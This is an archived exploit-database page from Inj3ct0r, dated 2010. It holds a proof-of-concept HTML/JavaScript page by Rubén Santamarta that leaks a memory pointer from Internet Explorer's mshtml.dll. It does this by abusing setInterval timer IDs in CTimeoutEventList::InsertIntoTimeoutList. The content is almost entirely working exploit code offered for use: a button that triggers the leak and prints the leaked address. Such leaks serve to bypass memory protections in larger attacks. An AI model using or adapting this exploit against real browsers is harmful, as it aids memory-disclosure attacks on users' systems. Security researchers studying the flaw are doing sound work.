<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MS mshtml.dll ctimeouteventlist insertintotimeoutlist Memory Leak</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================================
Microsoft MSHTML.DLL CTIMEOUTEVENTLIST INSERTINTOTIMEOUTLIST Memory Leak
========================================================================

&lt;html&gt;
&lt;!–http://reversemode.com/index.php?option=com_content&amp;task=view&amp;id=68&amp;Itemid=1 –&gt;
&lt;!– mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak – Rub?n Santamarta www.reversemode.com –&gt;

&lt;head&gt;

&lt;title&gt;mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak – Rub?n Santamarta www.reversemode.com&lt;/title&gt;

&lt;script type=’text/javascript’&gt;
var i = 1; // counter

function LeakOrDie() {
var t;
t=setInterval(&quot;foo()&quot;,2000);
t-=i;
document.getElementById(‘atun’).innerHTML = ‘&lt;b&gt; Pointer leaked:&lt;/b&gt; ‘+’0x’+t.toString(16);
i++;
}

function foo()
{
return;
}

&lt;/script&gt;

&lt;/head&gt;

&lt;body&gt;

&lt;INPUT TYPE=button VALUE=&quot;Press to leak&quot; ONCLICK=&quot;LeakOrDie();&quot;&gt;

&lt;br /&gt;&lt;br /&gt;

&lt;div id=’atun’&gt; &lt;/div&gt;

&lt;/body&gt;

&lt;/html&gt;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-09]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13267